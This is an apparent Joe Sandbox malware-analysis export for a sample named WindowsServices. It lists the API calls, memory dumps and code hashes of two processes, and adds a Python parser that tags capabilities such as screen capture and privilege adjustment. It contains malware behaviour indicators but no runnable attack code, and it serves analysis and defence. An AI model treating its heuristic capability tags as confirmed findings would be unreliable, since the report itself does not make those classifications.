                                                                        Control-flow Graph

[Control-flow graph image, not reproduced: function at 0x0040A940, basic blocks 0x40A940 to 0x40AABC, calling GetWindowRect (x2), _ftol, SetWindowRgn and ClientToScreen.]
                                                                        APIs
                                                                        • GetWindowRect.USER32(?,?), ref: 0040A97F
                                                                        • _ftol.MSVCRT ref: 0040A9D4
                                                                        • GetWindowRect.USER32(?,?), ref: 0040AA11
                                                                        • SetWindowRgn.USER32(?,0040C340,00000001), ref: 0040AA45
                                                                        • ClientToScreen.USER32(?,?), ref: 0040AA5D
                                                                        Memory Dump Source
                                                                        • Source File: 00000016.00000002.1862981113.0000000000401000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000016.00000002.1862785394.0000000000400000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000016.00000002.1862981113.000000000040E000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000016.00000002.1862981113.0000000000442000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000016.00000002.1866975540.0000000000443000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000016.00000002.1867296525.0000000000444000.00000004.00000001.01000000.00000007.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_22_2_400000_WindowsServices.jbxd
                                                                        Similarity
                                                                        • API ID: Window$Rect$ClientScreen_ftol
                                                                        • String ID:
                                                                        • API String ID: 2665761307-0
                                                                        • Opcode ID: b998918826c77febf2a25c4be3886caa5153053d104f383c60fb6be50d5108d4
                                                                        • Instruction ID: a66530a9fee688cda4384b7b61b220c0551d436bf9aef3ce9762855fe69dfb7b
                                                                        • Opcode Fuzzy Hash: b998918826c77febf2a25c4be3886caa5153053d104f383c60fb6be50d5108d4
                                                                        • Instruction Fuzzy Hash: 58413C752047059FC714DF25C98492BB7E9FBC8B04F004A2EF98693790DB38E909CBA6
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000016.00000002.1862981113.0000000000401000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000016.00000002.1862785394.0000000000400000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000016.00000002.1862981113.000000000040E000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000016.00000002.1862981113.0000000000442000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000016.00000002.1866975540.0000000000443000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000016.00000002.1867296525.0000000000444000.00000004.00000001.01000000.00000007.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_22_2_400000_WindowsServices.jbxd
                                                                        Similarity
                                                                        • API ID: _ftol$CreatePolygonRegion
                                                                        • String ID:
                                                                        • API String ID: 4272746700-0
                                                                        • Opcode ID: 17b7e62d37637a2d73482e15072a4be556ec02c4b51384e8a89ed16f1ffde3de
                                                                        • Instruction ID: bbc22f1e7c48a6dab8c73f5009b7f3ca445a8864c2917b6fdd274eb9f33cd00a
                                                                        • Opcode Fuzzy Hash: 17b7e62d37637a2d73482e15072a4be556ec02c4b51384e8a89ed16f1ffde3de
                                                                        • Instruction Fuzzy Hash: FF5113B5A087029FC300DF25C58491ABBF4FF88750F118A6EF895A2391EB35D925CB86
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Callgraph

[Callgraph image, not reproduced: 86 listed functions in the 0x00E82000/0x00E8A000, 0x01010000 and 0x04D30000 regions of this process; the only recorded edge is Function_01010648 -> Function_0101066A. The executed/relevance shading of the original graph is lost in the text export.]

                                                                        Control-flow Graph

[Control-flow graph image, not reproduced: function at 0x00E8A893, basic blocks 0xE8A893 to 0xE8A95A, calling AdjustTokenPrivileges at 0x00E8A913.]
                                                                        APIs
                                                                        • AdjustTokenPrivileges.KERNELBASE(?,?,?,?,?,?), ref: 00E8A913
                                                                        Memory Dump Source
                                                                        • Source File: 00000019.00000002.1919595339.0000000000E8A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E8A000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_25_2_e8a000_WindowsServices.jbxd
                                                                        Similarity
                                                                        • API ID: AdjustPrivilegesToken
                                                                        • String ID:
                                                                        • API String ID: 2874748243-0
                                                                        • Opcode ID: 1589fa8bfa869290b078d740b69a28d582506654fbe58464e70491422b416909
                                                                        • Instruction ID: fa2c61ad25522d083b6fbbfd8deda33b16568ecf1813b9f34a388b1ce7e40c96
                                                                        • Opcode Fuzzy Hash: 1589fa8bfa869290b078d740b69a28d582506654fbe58464e70491422b416909
                                                                        • Instruction Fuzzy Hash: D521A6755097809FEB128F25DC44B52BFF4EF06314F0D84EBE9898B563D2719918CB62
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Control-flow Graph

[Control-flow graph image, not reproduced: function at 0x00E8AA15, basic blocks 0xE8AA15 to 0xE8AAB2, calling NtQuerySystemInformation at 0x00E8AA81.]
                                                                        APIs
                                                                        • NtQuerySystemInformation.NTDLL ref: 00E8AA81
                                                                        Memory Dump Source
                                                                        • Source File: 00000019.00000002.1919595339.0000000000E8A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E8A000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_25_2_e8a000_WindowsServices.jbxd
                                                                        Similarity
                                                                        • API ID: InformationQuerySystem
                                                                        • String ID:
                                                                        • API String ID: 3562636166-0
                                                                        • Opcode ID: 5fc1e9c0e452309f638b3c653ef0b843b45bf49b49553f1e83bb9d38e60e0d78
                                                                        • Instruction ID: 76a040eb74842cdfdbbdd0a55c1ff5a49e3302a7b27478882cca3054d7bf31ec
                                                                        • Opcode Fuzzy Hash: 5fc1e9c0e452309f638b3c653ef0b843b45bf49b49553f1e83bb9d38e60e0d78
                                                                        • Instruction Fuzzy Hash: 62118E724093809FDB228F15DD45A52FFB4EF06324F0D84DBE9884B663D275A918CB62
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Control-flow Graph

[Control-flow graph image, not reproduced: function at 0x00E8A8CA, basic blocks 0xE8A8CA to 0xE8A95A. This entry point lies inside the 0x00E8A893 function listed above and shares its AdjustTokenPrivileges call site at 0x00E8A913, so the two listings describe overlapping code rather than two separate routines.]
                                                                        APIs
                                                                        • AdjustTokenPrivileges.KERNELBASE(?,?,?,?,?,?), ref: 00E8A913
                                                                        Memory Dump Source
                                                                        • Source File: 00000019.00000002.1919595339.0000000000E8A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E8A000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_25_2_e8a000_WindowsServices.jbxd
                                                                        Similarity
                                                                        • API ID: AdjustPrivilegesToken
                                                                        • String ID:
                                                                        • API String ID: 2874748243-0
                                                                        • Opcode ID: 9790042b9e5a49cab3cbb92746ae3fbc2d38223602ef4fac178cd9b5ea170724
                                                                        • Instruction ID: 4356ce1bd5d37f72dab297b6bd030a44527b5f6fed559eb6ba2c3ca2e001b266
                                                                        • Opcode Fuzzy Hash: 9790042b9e5a49cab3cbb92746ae3fbc2d38223602ef4fac178cd9b5ea170724
                                                                        • Instruction Fuzzy Hash: 7B11A0765042009FEB20DF55E948B52FBE4EF04320F0884AADD498B656D371E818DF62
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        • NtQuerySystemInformation.NTDLL ref: 00E8AA81
                                                                        Memory Dump Source
                                                                        • Source File: 00000019.00000002.1919595339.0000000000E8A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E8A000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_25_2_e8a000_WindowsServices.jbxd
                                                                        Similarity
                                                                        • API ID: InformationQuerySystem
                                                                        • String ID:
                                                                        • API String ID: 3562636166-0
                                                                        • Opcode ID: 548a157f42ca6335a5b40b5202dc8e778dbc8143362d3bb4e1a04ac1abeb4f9d
                                                                        • Instruction ID: 848d2b321189a253335bbbca47876c70e0224b5bfd8ac9956d301d63c5e5f8c5
                                                                        • Opcode Fuzzy Hash: 548a157f42ca6335a5b40b5202dc8e778dbc8143362d3bb4e1a04ac1abeb4f9d
                                                                        • Instruction Fuzzy Hash: DB018F354002009FEB209F05DA88B62FBE4EF08724F0CC4AADE890AB51D375A418DFA2
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%
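
As an added example (not part of the Joe Sandbox report): a small parser for the per-function "APIs" and "Memory Dump Source" lines in these listings. It decodes the hex PID at the front of each .sdmp name (0x16 = 22 and 0x19 = 25, matching the hcaresult_22_2 and hcaresult_25_2 snapshot names above) and tags a function when its full API set matches a capability cluster. The cluster table (CreateCompatibleDC + CreateCompatibleBitmap + BitBlt read as screen capture, AdjustTokenPrivileges as token privilege change, NtQuerySystemInformation as system enumeration) is a heuristic assumption of this example, not a classification the report makes. The sample input is copied from three of the listings on this page.

```python
"""Parse Joe Sandbox per-function API listings and tag capability clusters.

Added example; not part of the Joe Sandbox report. The regexes target the
"APIs" / "Memory Dump Source" text layout used in this report, and the
capability table is a heuristic assumption, not something the report states.
"""
import re
from collections import defaultdict

# Constructed sample input: lines copied from three function listings on this
# page (PID 0x16 = 22 for the GDI code, PID 0x19 = 25 for the token/NT code).
SAMPLE_REPORT = """\
APIs
• CreateCompatibleDC.GDI32(?), ref: 00409EBE
• CreateCompatibleBitmap.GDI32(?,?,?), ref: 00409EFB
• GetWindowRect.USER32(?,?), ref: 00409F87
• BitBlt.GDI32(?,?,?,?,?,?,?,?,00CC0020), ref: 00409FFA
Memory Dump Source
• Source File: 00000016.00000002.1862981113.0000000000401000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
APIs
• AdjustTokenPrivileges.KERNELBASE(?,?,?,?,?,?), ref: 00E8A913
Memory Dump Source
• Source File: 00000019.00000002.1919595339.0000000000E8A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E8A000, based on PE: false
APIs
• NtQuerySystemInformation.NTDLL ref: 00E8AA81
Memory Dump Source
• Source File: 00000019.00000002.1919595339.0000000000E8A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E8A000, based on PE: false
"""

# "• Api.MODULE(arg,arg), ref: ADDR": the argument list and the comma before
# "ref:" are both optional (compare the NtQuerySystemInformation line above).
API_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<api>\w+)\.(?P<mod>\w+)(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)"
)
# "• Source File: PID.DUMPIDX.TIMESTAMP.REGIONBASE.....sdmp, Offset: X, based on PE: bool"
SRC_RE = re.compile(
    r"Source File:\s*(?P<pid>[0-9A-Fa-f]{8})\.(?P<dumpidx>[0-9A-Fa-f]{8})\.\d+\."
    r"(?P<region>[0-9A-Fa-f]{16})\.[^,]*,\s*Offset:\s*(?P<offset>[0-9A-Fa-f]+),"
    r"\s*based on PE:\s*(?P<pe>true|false)"
)

# Heuristic clusters (assumption of this example). A function is tagged only
# when every API of a cluster is referenced from it, so a lone GetWindowRect
# does not count as screen capture.
CAPABILITY_HINTS = {
    "screen_capture": {"CreateCompatibleDC", "CreateCompatibleBitmap", "BitBlt"},
    "token_privilege_change": {"AdjustTokenPrivileges"},
    "system_enumeration": {"NtQuerySystemInformation"},
}


def parse_report(text):
    """Return one record per function: its API references plus the dump they came from."""
    functions, pending = [], []
    for line in text.splitlines():
        m = API_RE.search(line)
        if m:
            raw = m.group("args")
            args = [a.strip() for a in raw.split(",")] if raw else []
            pending.append({"api": m.group("api"), "module": m.group("mod"),
                            "args": args, "ref": int(m.group("ref"), 16),
                            "subcall": m.group("sub")})
            continue
        m = SRC_RE.search(line)
        if m:
            functions.append({
                "pid": int(m.group("pid"), 16),   # hex in the .sdmp name, decimal in .jbxd
                "region": int(m.group("region"), 16),
                "offset": int(m.group("offset"), 16),
                "based_on_pe": m.group("pe") == "true",
                "apis": pending,
            })
            pending = []
    return functions


def tag_capabilities(func):
    """Names of every capability cluster fully present in one function's API set."""
    seen = {a["api"] for a in func["apis"]}
    return {name for name, needed in CAPABILITY_HINTS.items() if needed <= seen}


def summarize(functions):
    """Capability tags per PID, merged across all functions dumped from that process."""
    per_pid = defaultdict(set)
    for f in functions:
        per_pid[f["pid"]] |= tag_capabilities(f)
    return dict(per_pid)


if __name__ == "__main__":
    for pid, tags in sorted(summarize(parse_report(SAMPLE_REPORT)).items()):
        print(f"PID {pid}: {', '.join(sorted(tags)) or '-'}")
```

On the three sample listings this reports screen_capture for PID 22 and token_privilege_change plus system_enumeration for PID 25. Keep the region base next to the PID when correlating: the PID 25 dumps above are marked "based on PE: false", so the AdjustTokenPrivileges and NtQuerySystemInformation call sites at 0x00E8A913 and 0x00E8AA81 sit in memory that was not dumped from a PE image, which is the kind of region to cross-check against the report's injection signatures.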

                                                                        Control-flow Graph

[Control-flow graph image, not reproduced: function at 0x04D30392, basic blocks 0x4D30392 to 0x4D30BB8, with no API calls recorded.]
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000019.00000002.1928694207.0000000004D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D30000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_25_2_4d30000_WindowsServices.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: 2k$2k$a
                                                                        • API String ID: 0-3689935833
                                                                        • Opcode ID: 48194ae8c9dd0daffd305c8dfbbc55a2834b53bd6dac99910e9c18f69a0ff9be
                                                                        • Instruction ID: 0ae85d38d78edfa2359cee0060955bc075a9df894fab8a732cf36613baae32ca
                                                                        • Opcode Fuzzy Hash: 48194ae8c9dd0daffd305c8dfbbc55a2834b53bd6dac99910e9c18f69a0ff9be
                                                                        • Instruction Fuzzy Hash: 45616074A01258CFDB14EF75C945BECB7B2BF84309F1080AAD449AB295DB399E85CF60
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Control-flow Graph (rendered graph not preserved; basic blocks 4d30429-4d30bb8)
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000019.00000002.1928694207.0000000004D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D30000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_25_2_4d30000_WindowsServices.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: 2k$2k$a
                                                                        • API String ID: 0-3689935833
                                                                        • Opcode ID: 89dfc748af253c58463c0ab8703c8d66605534494d49be34a45ff9a2bcfbdb3e
                                                                        • Instruction ID: 0ad53c60bcf13bb0411e21063381328ef5c3d800495563a3b468dbb2995c1d7b
                                                                        • Opcode Fuzzy Hash: 89dfc748af253c58463c0ab8703c8d66605534494d49be34a45ff9a2bcfbdb3e
                                                                        • Instruction Fuzzy Hash: 1E515D74A012188FDB64EF75C955BECB7B2AF84308F5080AAD409BB394DB355E89CF61
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Control-flow Graph (rendered graph not preserved; basic blocks e8ab92-e8ac8e, calls CreateMutexW)
                                                                        APIs
                                                                        • CreateMutexW.KERNELBASE(?,?), ref: 00E8AC39
                                                                        Memory Dump Source
                                                                        • Source File: 00000019.00000002.1919595339.0000000000E8A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E8A000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_25_2_e8a000_WindowsServices.jbxd
                                                                        Similarity
                                                                        • API ID: CreateMutex
                                                                        • String ID:
                                                                        • API String ID: 1964310414-0
                                                                        • Opcode ID: ed611df534ef1e9a573d792939c7fc4490bd97c996c618c6ab8c6d7521c5ca87
                                                                        • Instruction ID: d7312565266fe88a319b4ef8e0fe72847783b6c53c1af4e43508ad07bd7d7cee
                                                                        • Opcode Fuzzy Hash: ed611df534ef1e9a573d792939c7fc4490bd97c996c618c6ab8c6d7521c5ca87
                                                                        • Instruction Fuzzy Hash: 2931B3B55093805FE712CB25DD48B96FFF8EF06314F09849AE988DB292D335A909C762
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Control-flow Graph (rendered graph not preserved; basic blocks e8a361-e8a447, calls RegQueryValueExW)
                                                                        APIs
                                                                        • RegQueryValueExW.KERNELBASE(?,00000E24,DFFF4500,00000000,00000000,00000000,00000000), ref: 00E8A40C
                                                                        Memory Dump Source
                                                                        • Source File: 00000019.00000002.1919595339.0000000000E8A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E8A000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_25_2_e8a000_WindowsServices.jbxd
                                                                        Similarity
                                                                        • API ID: QueryValue
                                                                        • String ID:
                                                                        • API String ID: 3660427363-0
                                                                        • Opcode ID: f77814e4455bd3d6ba68784e7684c28c5c45f88a1847e6246c9e0fc61cbf2611
                                                                        • Instruction ID: b3de761565e3a4275b870f9a6dbeabeded9270c7f1392b5eb4facfec33fb3c67
                                                                        • Opcode Fuzzy Hash: f77814e4455bd3d6ba68784e7684c28c5c45f88a1847e6246c9e0fc61cbf2611
                                                                        • Instruction Fuzzy Hash: D431B4751057405FE722CF11DC84F92BBF8EF05714F08849AE9499B692D324E908CB71
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Control-flow Graph (rendered graph not preserved; basic blocks e8a462-e8a533, calls RegSetValueExW)
                                                                        APIs
                                                                        • RegSetValueExW.KERNELBASE(?,00000E24,DFFF4500,00000000,00000000,00000000,00000000), ref: 00E8A4F8
                                                                        Memory Dump Source
                                                                        • Source File: 00000019.00000002.1919595339.0000000000E8A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E8A000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_25_2_e8a000_WindowsServices.jbxd
                                                                        Similarity
                                                                        • API ID: Value
                                                                        • String ID:
                                                                        • API String ID: 3702945584-0
                                                                        • Opcode ID: e439054be9ad7b6815a42b6efbe67654d5ac96dc5fcf8c4acf47825148263671
                                                                        • Instruction ID: 8659e3ebecceb90e6c7106893ee685974ec6ea23e1269434acd375790a17f7ed
                                                                        • Opcode Fuzzy Hash: e439054be9ad7b6815a42b6efbe67654d5ac96dc5fcf8c4acf47825148263671
                                                                        • Instruction Fuzzy Hash: 3D21B2B21043806FE7228F11DD44FA3BFB8DF06714F08849AE949DB652D264E948C771
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Control-flow Graph (rendered graph not preserved; basic blocks e8a67b-e8a73d, calls LookupPrivilegeValueW)
                                                                        APIs
                                                                        • LookupPrivilegeValueW.ADVAPI32(?,?,?), ref: 00E8A6F6
                                                                        Memory Dump Source
                                                                        • Source File: 00000019.00000002.1919595339.0000000000E8A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E8A000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_25_2_e8a000_WindowsServices.jbxd
                                                                        Similarity
                                                                        • API ID: LookupPrivilegeValue
                                                                        • String ID:
                                                                        • API String ID: 3899507212-0
                                                                        • Opcode ID: 6be88b530f82d3babf6f2479104f3cb42c1b2b394b27e56d48c5d30c0ede5768
                                                                        • Instruction ID: f4d9bc368c1b54ff07978465b4860ab6324fbab770172de2e4e36498a37deb52
                                                                        • Opcode Fuzzy Hash: 6be88b530f82d3babf6f2479104f3cb42c1b2b394b27e56d48c5d30c0ede5768
                                                                        • Instruction Fuzzy Hash: B32183755093805FE7128B65DC45B92BFF8EF06324F0D84EBE988CB2A3D225D918D762
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Control-flow Graph (rendered graph not preserved; basic blocks e8abc6-e8ac8e, calls CreateMutexW)
                                                                        APIs
                                                                        • CreateMutexW.KERNELBASE(?,?), ref: 00E8AC39
                                                                        Memory Dump Source
                                                                        • Source File: 00000019.00000002.1919595339.0000000000E8A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E8A000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_25_2_e8a000_WindowsServices.jbxd
                                                                        Similarity
                                                                        • API ID: CreateMutex
                                                                        • String ID:
                                                                        • API String ID: 1964310414-0
                                                                        • Opcode ID: 4d3243e1bca655752bcb69df1fbf655c3db69b1390e07d1df9e0ddd72099b889
                                                                        • Instruction ID: d49c4ab810f3a22b03674a9015278088cfa7b42bb5be6d42059b857f068bfd97
                                                                        • Opcode Fuzzy Hash: 4d3243e1bca655752bcb69df1fbf655c3db69b1390e07d1df9e0ddd72099b889
                                                                        • Instruction Fuzzy Hash: 6F2180B15002009FF720DF65DD49BA6FBE8EF04724F18846AED489B741D375E908CB62
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Control-flow Graph (rendered graph not preserved; basic blocks e8a392-e8a447, calls RegQueryValueExW)
                                                                        APIs
                                                                        • RegQueryValueExW.KERNELBASE(?,00000E24,DFFF4500,00000000,00000000,00000000,00000000), ref: 00E8A40C
                                                                        Memory Dump Source
                                                                        • Source File: 00000019.00000002.1919595339.0000000000E8A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E8A000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_25_2_e8a000_WindowsServices.jbxd
                                                                        Similarity
                                                                        • API ID: QueryValue
                                                                        • String ID:
                                                                        • API String ID: 3660427363-0
                                                                        • Opcode ID: db6733b53308cffccc37afc1378350fe8105ac20d2934b2ddaa8a7601752c2d3
                                                                        • Instruction ID: 9df7b21943b23c375f3092302fc8870700c941b7b2af04738625b5b19df69855
                                                                        • Opcode Fuzzy Hash: db6733b53308cffccc37afc1378350fe8105ac20d2934b2ddaa8a7601752c2d3
                                                                        • Instruction Fuzzy Hash: 9921C0B52006009FEB20DF15DD88FA6F7ECEF04714F08846AED499B651D360E908CB72
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Control-flow Graph (rendered graph not preserved; basic blocks e8a960-e8aa13, calls FindCloseChangeNotification)
                                                                        APIs
                                                                        • FindCloseChangeNotification.KERNELBASE(?), ref: 00E8A9CC
                                                                        Memory Dump Source
                                                                        • Source File: 00000019.00000002.1919595339.0000000000E8A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E8A000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_25_2_e8a000_WindowsServices.jbxd
                                                                        Similarity
                                                                        • API ID: ChangeCloseFindNotification
                                                                        • String ID:
                                                                        • API String ID: 2591292051-0
                                                                        • Opcode ID: 19f1c40c97e052851263997f5265ee54f2469e3bd6b45862a41f49aea9221eb4
                                                                        • Instruction ID: 1a7ed2d63fce56ad7aadeb26346ff43dbae63dcab4b8026a23d19ba4271cdea1
                                                                        • Opcode Fuzzy Hash: 19f1c40c97e052851263997f5265ee54f2469e3bd6b45862a41f49aea9221eb4
                                                                        • Instruction Fuzzy Hash: 3A219F725093C05FDB128B25DD54A92BFA4AF07724F0D84DAE9858F663D264A908CB62
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Control-flow Graph (rendered graph not preserved; basic blocks e8a486-e8a533, calls RegSetValueExW)
                                                                        APIs
                                                                        • RegSetValueExW.KERNELBASE(?,00000E24,DFFF4500,00000000,00000000,00000000,00000000), ref: 00E8A4F8
                                                                        Memory Dump Source
                                                                        • Source File: 00000019.00000002.1919595339.0000000000E8A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E8A000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_25_2_e8a000_WindowsServices.jbxd
                                                                        Similarity
                                                                        • API ID: Value
                                                                        • String ID:
                                                                        • API String ID: 3702945584-0
                                                                        • Opcode ID: 542c341f3c51948563979ec5ca0ea4b2937dc2e5e952b5b7af674ecf1cb16328
                                                                        • Instruction ID: 850ad92e64ad866fd39bf337d0c98d0104eeac61db26fbb7ac168c490745f8c2
                                                                        • Opcode Fuzzy Hash: 542c341f3c51948563979ec5ca0ea4b2937dc2e5e952b5b7af674ecf1cb16328
                                                                        • Instruction Fuzzy Hash: 7611B4B65006009FEB219F11DD48FA7BBECEF04714F08846AED499A751D374E948CB72
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Control-flow Graph (rendered graph not preserved; basic blocks e8a6ae-e8a73d, calls LookupPrivilegeValueW)
                                                                        APIs
                                                                        • LookupPrivilegeValueW.ADVAPI32(?,?,?), ref: 00E8A6F6
                                                                        Memory Dump Source
                                                                        • Source File: 00000019.00000002.1919595339.0000000000E8A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E8A000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_25_2_e8a000_WindowsServices.jbxd
                                                                        Similarity
                                                                        • API ID: LookupPrivilegeValue
                                                                        • String ID:
                                                                        • API String ID: 3899507212-0
                                                                        • Opcode ID: af3493551a32d67ee0d692d7bab45220b79ce12856d5d2c5a461e0051bdecefc
                                                                        • Instruction ID: 8c2dd841da52514d00501c341a372322c03d45ca9b34b1c4990ad1d92e17b2eb
                                                                        • Opcode Fuzzy Hash: af3493551a32d67ee0d692d7bab45220b79ce12856d5d2c5a461e0051bdecefc
                                                                        • Instruction Fuzzy Hash: FA1170756002008FEB10DF15D948B56BBE8EF04724F1C846BDD0DDB755E275E818DB62
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Control-flow Graph (rendered graph not preserved; basic blocks e8a99a-e8aa13, calls FindCloseChangeNotification)
                                                                        APIs
                                                                        • FindCloseChangeNotification.KERNELBASE(?), ref: 00E8A9CC
                                                                        Memory Dump Source
                                                                        • Source File: 00000019.00000002.1919595339.0000000000E8A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E8A000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_25_2_e8a000_WindowsServices.jbxd
                                                                        Similarity
                                                                        • API ID: ChangeCloseFindNotification
                                                                        • String ID:
                                                                        • API String ID: 2591292051-0
                                                                        • Opcode ID: d1d21ebbc3d71649bee435560daca68a19a0ba50be985ab21edd843b9df8394f
                                                                        • Instruction ID: f90b6a57b099c0834b933216eaf056ce9e7537ea40c5a2784fdb99ed2552893e
                                                                        • Opcode Fuzzy Hash: d1d21ebbc3d71649bee435560daca68a19a0ba50be985ab21edd843b9df8394f
                                                                        • Instruction Fuzzy Hash: 4601D4755046408FEB10DF15E988792FBE4EF40724F08C4ABDD0D8BB56D274E908CB62
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Memory Dump Source
                                                                        • Source File: 00000019.00000002.1928694207.0000000004D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D30000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_25_2_4d30000_WindowsServices.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 1d6f4dfc1660751cb37cbca01891cdd7a0d2dde78697ccd62f7b8bbbad5e8ab8
                                                                        • Instruction ID: 3cfd388c3c58679e456526e6eb6d735bfa6893462b4ac9716ab3bc8435f87fe6
                                                                        • Opcode Fuzzy Hash: 1d6f4dfc1660751cb37cbca01891cdd7a0d2dde78697ccd62f7b8bbbad5e8ab8
                                                                        • Instruction Fuzzy Hash: 3D4159341062C58FC704FF36EA8D68AB7B2AB8134C7468529D404DB66EDF785D4DCB91
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000019.00000002.1920552667.0000000001010000.00000040.00000020.00020000.00000000.sdmp, Offset: 01010000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_25_2_1010000_WindowsServices.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 250e8ac9a7a955f43843a918b73009323ee11084363c5da26ba5e5f5ab46ed12
• Instruction ID: 0cb8258ca6ad8bb8f02ce6f00c67c8290aefb3009cceae3d2225b744bfebc32a
• Opcode Fuzzy Hash: 250e8ac9a7a955f43843a918b73009323ee11084363c5da26ba5e5f5ab46ed12
• Instruction Fuzzy Hash: 7301F9B650D7C05FCB128B15EC40862FFE8EF4662070884DFE8C88B656D1296948CB71
Uniqueness

Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000019.00000002.1928694207.0000000004D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D30000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_25_2_4d30000_WindowsServices.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 73136bf5d3a159b9fdc7b8592ebd7293d296f3671056e19e77f375af31f34eb8
• Instruction ID: 88cb66302fc6c5119266c2ec8a7074e99d5bc2cb90c29c9ca432713a06c0eec3
• Opcode Fuzzy Hash: 73136bf5d3a159b9fdc7b8592ebd7293d296f3671056e19e77f375af31f34eb8
• Instruction Fuzzy Hash: 37F027347002008BC3157739A82967E735BABC139A709443CE5459F389CF3D8C49C3E1
Uniqueness

Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000019.00000002.1920552667.0000000001010000.00000040.00000020.00020000.00000000.sdmp, Offset: 01010000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_25_2_1010000_WindowsServices.jbxd
Similarity
